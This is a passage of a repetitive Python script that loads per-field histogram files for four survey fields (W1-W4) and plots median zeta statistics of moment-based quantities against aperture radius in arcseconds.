unpack=True)\nq_W4_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_45 = q_read[q_read < 10]\n\nplt.subplot(457)\nrangemax=4\nplt.xlim(25,140)\n#plt.scatter(45, np.median(q_W1_50_45), color='b', label='W1_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W2_50_45), color='g', label='W2_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W3_50_45), color='r', label='W3_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W4_50_45), color='k', label='W4_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W1_75_45), color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W2_75_45), color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W3_75_45), color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W4_75_45), color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W1_50_45),np.median(q_W1_50_60),np.median(q_W1_50_90),np.median(q_W1_50_120)], color='b', label='W1_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W2_50_45),np.median(q_W2_50_60),np.median(q_W2_50_90),np.median(q_W2_50_120)], color='g', label='W2_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W3_50_45),np.median(q_W3_50_60),np.median(q_W3_50_90),np.median(q_W3_50_120)], color='r', label='W3_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W4_50_45),np.median(q_W4_50_60),np.median(q_W4_50_90),np.median(q_W4_50_120)], color='k', label='W4_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W1_75_45),np.median(q_W1_75_60),np.median(q_W1_75_90),np.median(q_W1_75_120)], color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W2_75_45),np.median(q_W2_75_60),np.median(q_W2_75_90),np.median(q_W2_75_120)], color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W3_75_45),np.median(q_W3_75_60),np.median(q_W3_75_90),np.median(q_W3_75_120)], color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W4_75_45),np.median(q_W4_75_60),np.median(q_W4_75_90),np.median(q_W4_75_120)], color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nax=plt.subplot(457)\n#s = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\n#ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\nplt.ylabel(r'$\\zeta_{M^2_{rms}}$', fontsize=15)\nplt.xlabel(\"radius [arcsec]\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 6\n\ncols=13\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_45 = q_read[q_read < 10]\n\nplt.subplot(458)\nrangemax=6\nplt.xlim(25,140)\n#plt.scatter(45, np.median(q_W1_50_45), color='b', label='W1_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W2_50_45), color='g', label='W2_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W3_50_45), color='r', label='W3_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W4_50_45), color='k', label='W4_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W1_75_45), color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W2_75_45), color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W3_75_45), color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W4_75_45), color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W1_50_45),np.median(q_W1_50_60),np.median(q_W1_50_90),np.median(q_W1_50_120)], color='b', label='W1_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W2_50_45),np.median(q_W2_50_60),np.median(q_W2_50_90),np.median(q_W2_50_120)], color='g', label='W2_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W3_50_45),np.median(q_W3_50_60),np.median(q_W3_50_90),np.median(q_W3_50_120)], color='r', label='W3_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W4_50_45),np.median(q_W4_50_60),np.median(q_W4_50_90),np.median(q_W4_50_120)], color='k', label='W4_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W1_75_45),np.median(q_W1_75_60),np.median(q_W1_75_90),np.median(q_W1_75_120)], color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W2_75_45),np.median(q_W2_75_60),np.median(q_W2_75_90),np.median(q_W2_75_120)], color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W3_75_45),np.median(q_W3_75_60),np.median(q_W3_75_90),np.median(q_W3_75_120)], color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W4_75_45),np.median(q_W4_75_60),np.median(q_W4_75_90),np.median(q_W4_75_120)], color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nax=plt.subplot(458)\n#s = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\n#ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\nplt.ylabel(r'$\\zeta_{M^3}$', fontsize=15)\nplt.xlabel(\"radius [arcsec]\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 7\n\ncols=15\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_45 = q_read[q_read < 10]\n\nplt.subplot(459)\nrangemax=6\nplt.xlim(25,140)\n#plt.scatter(45, np.median(q_W1_50_45), color='b', label='W1_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W2_50_45), color='g', label='W2_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W3_50_45), color='r', label='W3_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W4_50_45), color='k', label='W4_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W1_75_45), color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W2_75_45), color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W3_75_45), color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W4_75_45), color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W1_50_45),np.median(q_W1_50_60),np.median(q_W1_50_90),np.median(q_W1_50_120)], color='b', label='W1_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W2_50_45),np.median(q_W2_50_60),np.median(q_W2_50_90),np.median(q_W2_50_120)], color='g', label='W2_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W3_50_45),np.median(q_W3_50_60),np.median(q_W3_50_90),np.median(q_W3_50_120)], color='r', label='W3_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W4_50_45),np.median(q_W4_50_60),np.median(q_W4_50_90),np.median(q_W4_50_120)], color='k', label='W4_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W1_75_45),np.median(q_W1_75_60),np.median(q_W1_75_90),np.median(q_W1_75_120)], color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W2_75_45),np.median(q_W2_75_60),np.median(q_W2_75_90),np.median(q_W2_75_120)], color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W3_75_45),np.median(q_W3_75_60),np.median(q_W3_75_90),np.median(q_W3_75_120)], color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W4_75_45),np.median(q_W4_75_60),np.median(q_W4_75_90),np.median(q_W4_75_120)], color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nax=plt.subplot(459)\n#s = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\n#ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\nplt.ylabel(r'$\\zeta_{M^3_{rms}}$', fontsize=15)\nplt.xlabel(\"radius [arcsec]\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 8\n\ncols=17\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size120_i%s.lst' 